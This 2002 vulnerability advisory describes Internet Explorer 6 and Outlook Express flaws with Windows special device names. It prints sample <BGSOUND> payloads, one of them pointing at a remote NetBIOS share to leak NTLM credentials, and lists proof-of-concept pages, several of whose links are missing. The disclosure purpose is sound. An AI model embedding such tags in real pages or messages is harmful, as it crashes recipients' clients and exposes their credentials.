Title: special device access and DoS in Microsoft Internet
Authors: ERRor, 3APA3A
Date: May, 14 2002
Affected: Internet Explorer 6.0
Risk: Average to high
Vendor notified: April, 24 2002
All versions of Windows have a reserved filenames referred to special
devices such as prn, aux, nul, etc also called DOS devices. Filename for
special device may have any directory path and any extension after dot.
For example c:\temp\prn.tmp refers to prn device. Same API is used to
access special device and regular files. Unauthorized access to special
device may be significant security issue causing different results: from
Denial of Service against running program or service to hardware failure
or secure data compromise.
ERRor discovered that <BGSOUND> tag in conjunction with special device
name causes DoS against Internet Explorer or Outlook Express regardless
of security zone settings. For Outlook Express it's untrivial to remove
malcrafted message without losing message folder.
During investigation of this issue it was found by 3APA3A and ERRor that
using <IFRAME> tag it's possible to send any data to special device.
Another problem is that regardless of security zone settings source
specified in <BGSOUND> tag is always downloaded. It makes it possible to
fingerprint remote client by his e-mail using something like
<bgsound src="http:[email protected]">
Remote client fingerprint problem is discussed in .
4th problem (reported by Chad Loder ) is that by using
tag like <bgsound src="\\126.96.36.199\new\file.wav"> it's possible
to cause IE to establish external NetBIOS connection. Depending on
LMCompatibilityLevel it may cause user's cleartext password or NTLMv1
challenge to leak. It's very serious bug.
You can use  to test DoS against Outlook Express via <BGSOUN>. 
will print text line on a text printer attached to lpt1 in Outlook
Express 6.0 via <IFRAME>
1. Special device access and DoS in Outlook Express
2. Outlook Express Special Device DoS POC
3. Outlook Express Special Device access POC
4. Security risks assoticated with using e-mail.
Microsoft was informed on April, 24, 2002. No feedback from vendor since